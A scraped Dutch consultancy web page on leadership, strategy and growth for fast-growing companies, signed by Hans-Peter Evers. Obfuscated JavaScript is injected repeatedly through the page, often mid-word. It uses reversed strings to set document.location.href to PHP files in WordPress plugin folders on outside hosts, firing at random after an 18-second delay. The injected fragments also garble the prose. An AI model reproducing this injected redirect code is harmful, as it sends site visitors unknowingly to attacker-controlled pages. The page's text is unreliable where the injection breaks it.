) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top_left” background_repeat=”repeat” background_size=”initial” _builder_version=”3.0.106″]

Strategie bepalen en klinkende resultaten neerzetten

Nederland heeft zo’n 10.000 bedrijven die een snelle groei doormaken, en bijna allemaal krijgen ze te maken met knelpunten in de gebieden leiderschap, strategie, financiën, ICT en marktpositionering. Veel van hen worden ook geconfronteerd met problemen rondom opvolging, overnames en het vinden van de juiste business partners.

Ben Tiggelaar:
70 % van familiebedrijven overleeft de eerste overdracht niet
80 % van project managers ziet geen relatie tussen projecten en strategie
5 % van management is zeer tevreden over digitale transformatie
26 % van leidinggevenden denkt dat zij de organisatiecultuur bepalen

de meerderheid mislukt:
60 % van invoeren van nieuwe technologie
70 % van invoeren nieuwe processen
81 % van cultuurverandering

Directies die nog niet veel ervaring hebben met het leiden van een sterk groeiende onderneming worden dagelijks geconfronteerd met strategische keuzes. Keuzes die serieuze gevolgen hebben voor de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst van het bedrijf. De hiërarchische wijze van leidinggeven uit het verleden past niet meer in een sterk veranderende omgeving. Teamwork en zich eigenaar voelen van een deel van de onderneming geven een betere basis. Uit onderzoek blijkt dat bedrijven die een succesvolle groei realiseren vaak worden geleid door ervaren managers, vaak afkomstig uit grotere bedrijven, die op directieniveau al de nodige vlieguren hebben mogen maken in complexe omgevingen.

 

Wat is goed leiderschap?

 • Heldere richting (de ‘stip op de horizon’) met duidelijke prioriteiten (focus!)
 • Creëren van een stimulerende werkomgeving voor alle betrokkenen
 • Capabel en complementair leiderschapsteam dat voorbeeldgedrag vertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toont, operationeel focus geeft en uitvoering bewaakt en waar nodig bijstuurt
 • Is gericht op vertrouwen, waarde creatie en verzekeren van continuïteit
 • Evenwichtige besluitvorming met ‘checks and balances’
 • Gebaseerd op uitgangspunten van ‘goed bestuur’
 • Compliance is daarbij een hygiëne factoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor

Heldere richting

 • Verbindt lange termijn horizon met de korte termijn doelen
 • Legt een stevige basis voor verdere groei, in mensen, processen en (ICT) systemen
 • Geeft antwoord op een veranderende omgeving, inclusief digitale uitdagingen
 • Zorgt voor formule voor opschalen en internationale groei (Scaling Up)
 • Wordt regelmatig geëvalueerd

Stimulerende werkomgeving

 • Een organisatie met aanpassingsvermogen en een mentaliteit van “het kan altijd beter”
 • Daagt mensen uit en geeft ze ruimte om te groeien
 • Heeft juiste mensen op de juiste plek, helpt ze bij hun ontwikkeling en om hun veranderingsbereidheid te maximaliseren.
 • Legt de brug tussen technologische kansen en het talent van mensen om zo het prestatievermogen van het bedrijf te vergroten.
 • Investeert in de groei van mens én organisatie
 • Maakt (gewenst) gedrag bespreekbaar
 • Heeft een cultuur van continue leren en verbeteren, gebaseerd op actuele (management)informatie (KPI’s)

Hierbij hoort een bestuursmodel dat past bij de context van de organisatie en een toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst waarin alles aan verandering onderhevig is.

Hans-Peter Evers
E   $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:hanspeterevers@tanera.com”>hanspeterevers@tanera.com
M +31 622 791 109